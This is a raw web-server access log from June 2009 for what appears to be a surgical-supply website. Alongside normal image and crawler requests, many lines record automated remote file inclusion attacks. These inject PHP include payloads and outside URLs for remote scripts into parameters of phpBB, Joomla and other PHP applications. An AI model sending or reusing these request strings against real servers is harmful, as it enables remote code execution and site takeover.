209.51.133.202 - - [22/Jun/2009:04:45:27 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:04:46:33 -0400] "GET /images/over-index6_sterglovs.jpg HTTP/1.1" 200 2530 "-" "Googlebot-Image/1.0"
211.49.99.7 - - [22/Jun/2009:04:47:12 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:47:40 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/ask_password.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:47:44 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/ask_password.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:47:59 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:47:59 -0400] "GET /logs/access_log.Q109051900/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:47:59 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:47:59 -0400] "GET /logs/access_log.Q109051900/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:47:59 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:47:59 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
124.229.248.43 - - [22/Jun/2009:04:48:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; aff-kingsoft-ciba; MAXTHON 2.0)"
124.229.248.43 - - [22/Jun/2009:04:48:13 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; aff-kingsoft-ciba; MAXTHON 2.0)"
211.172.225.50 - - [22/Jun/2009:04:48:15 -0400] "GET /logs/access_log.Q109051900/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:48:15 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:48:15 -0400] "GET /logs/access_log.Q109051900/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:48:15 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:48:15 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:48:15 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:48:16 -0400] "GET /logs/access_log.Q109052300/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:48:16 -0400] "GET /logs/access_log.Q109052300/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.229.248.43 - - [22/Jun/2009:04:48:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; aff-kingsoft-ciba; MAXTHON 2.0)"
124.229.248.43 - - [22/Jun/2009:04:48:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; aff-kingsoft-ciba; MAXTHON 2.0)"
209.59.12.99 - - [22/Jun/2009:04:48:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.14 - - [22/Jun/2009:04:50:26 -0400] "GET /images/over-index10_vital.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
211.172.225.50 - - [22/Jun/2009:04:50:40 -0400] "GET /logs/access_log.Q109051900%20%20/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:50:40 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:50:40 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:50:40 -0400] "GET /logs/access_log.Q109052300%20%20/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:50:54 -0400] "GET /logs/access_log.Q109051900%20%20/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:50:54 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:50:54 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:50:54 -0400] "GET /logs/access_log.Q109052300%20%20/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:51:31 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:04:51:34 -0400] "GET /logs/access_log.Q108091700 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.172.225.50 - - [22/Jun/2009:04:52:29 -0400] "GET /logs/access_log.Q109051900/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:52:29 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:52:29 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:52:30 -0400] "GET /logs/access_log.Q109052300/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:53:08 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:53:08 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:53:08 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:53:08 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:04:53:12 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:04:53:13 -0400] "GET /logs/access_log.Q109060400//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.35.23.64 - - [22/Jun/2009:04:53:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
121.35.23.64 - - [22/Jun/2009:04:53:26 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
121.35.23.64 - - [22/Jun/2009:04:53:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
121.35.23.64 - - [22/Jun/2009:04:53:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
209.59.12.99 - - [22/Jun/2009:04:53:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.172.225.50 - - [22/Jun/2009:04:53:53 -0400] "GET /logs/access_log.Q109051900/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:53:53 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:53:53 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:04:53:53 -0400] "GET /logs/access_log.Q109052300/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.59.193.52 - - [22/Jun/2009:04:54:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
212.59.193.52 - - [22/Jun/2009:04:54:02 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
212.59.193.52 - - [22/Jun/2009:04:54:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
212.59.193.52 - - [22/Jun/2009:04:54:04 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
212.59.193.52 - - [22/Jun/2009:04:54:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
222.122.179.44 - - [22/Jun/2009:04:54:38 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:54:38 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:54:38 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:54:38 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:54:38 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:54:38 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:54:43 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:54:43 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.188.159.90 - - [22/Jun/2009:04:55:43 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/patientgraftingbrochure.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
212.188.159.90 - - [22/Jun/2009:04:55:43 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/patientgraftingbrochure.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
212.188.159.90 - - [22/Jun/2009:04:55:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/patientgraftingbrochure.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
212.188.159.90 - - [22/Jun/2009:04:55:45 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/patientgraftingbrochure.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
212.59.193.52 - - [22/Jun/2009:04:56:14 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
212.59.193.52 - - [22/Jun/2009:04:56:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
212.59.193.52 - - [22/Jun/2009:04:56:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
212.59.193.52 - - [22/Jun/2009:04:56:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
221.224.112.98 - - [22/Jun/2009:04:56:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 528; TencentTraveler 4.0; .NET CLR 2.0.50727; CIBA)"
221.224.112.98 - - [22/Jun/2009:04:56:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 528; TencentTraveler 4.0; .NET CLR 2.0.50727; CIBA)"
221.224.112.98 - - [22/Jun/2009:04:56:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 528; TencentTraveler 4.0; .NET CLR 2.0.50727; CIBA)"
221.224.112.98 - - [22/Jun/2009:04:56:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 528; TencentTraveler 4.0; .NET CLR 2.0.50727; CIBA)"
210.115.58.73 - - [22/Jun/2009:04:58:35 -0400] "GET /logs/access_log.Q109060400%20%20//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:04:58:39 -0400] "GET /logs/access_log.Q109060400%20%20//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:04:58:40 -0400] "GET /logs/access_log.Q109060800%20%20//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:58:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.115.58.73 - - [22/Jun/2009:04:58:47 -0400] "GET /logs/access_log.Q109060800%20%20//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:59:22 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:04:59:23 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.88.179.68 - - [22/Jun/2009:04:59:25 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:04:59:25 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:04:59:25 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
222.122.179.44 - - [22/Jun/2009:05:00:27 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:05:00:30 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:05:02:54 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:03:07 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:03:07 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:05:03:07 -0400] "GET /?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:03:07 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:05:03:11 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:05:03:21 -0400] "GET /logs/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
212.88.179.68 - - [22/Jun/2009:05:04:03 -0400] "GET /logs/error_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
221.224.112.98 - - [22/Jun/2009:05:04:06 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 528; TencentTraveler 4.0; .NET CLR 2.0.50727; CIBA)"
221.224.112.98 - - [22/Jun/2009:05:04:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 528; TencentTraveler 4.0; .NET CLR 2.0.50727; CIBA)"
221.224.112.98 - - [22/Jun/2009:05:04:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 528; TencentTraveler 4.0; .NET CLR 2.0.50727; CIBA)"
221.224.112.98 - - [22/Jun/2009:05:04:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 528; TencentTraveler 4.0; .NET CLR 2.0.50727; CIBA)"
211.172.225.50 - - [22/Jun/2009:05:04:24 -0400] "GET /logs/access_log.Q109051900%20%20/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:05:04:25 -0400] "GET /logs/access_log.Q109051900%20%20/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:04:26 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:04:26 -0400] "GET /logs/access_log.Q109050700//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:04:26 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:05:04:58 -0400] "GET /logs/access_log.Q109052300%20%20/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.172.225.50 - - [22/Jun/2009:05:04:59 -0400] "GET /logs/access_log.Q109052300%20%20/?/sourcedir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
212.88.179.68 - - [22/Jun/2009:05:05:20 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:05:05:20 -0400] "GET /?sourcedir=http://www.egile.lt/images/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:05:05:21 -0400] "GET /logs/?sourcedir=http://www.egile.lt/images/id.txt?? HTTP/1.1" 200 6510 "-" "libwww-perl/5.805"
69.64.89.139 - - [22/Jun/2009:05:05:23 -0400] "GET /logs/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:05:05:23 -0400] "GET /include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:05:05:23 -0400] "GET /logs/access_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:05:05:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.64.89.139 - - [22/Jun/2009:05:05:31 -0400] "GET /logs/error_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:05:44 -0400] "GET /logs/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:05:44 -0400] "GET /include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:05:44 -0400] "GET /logs/access_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:05:48 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:05:57 -0400] "GET /logs/error_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
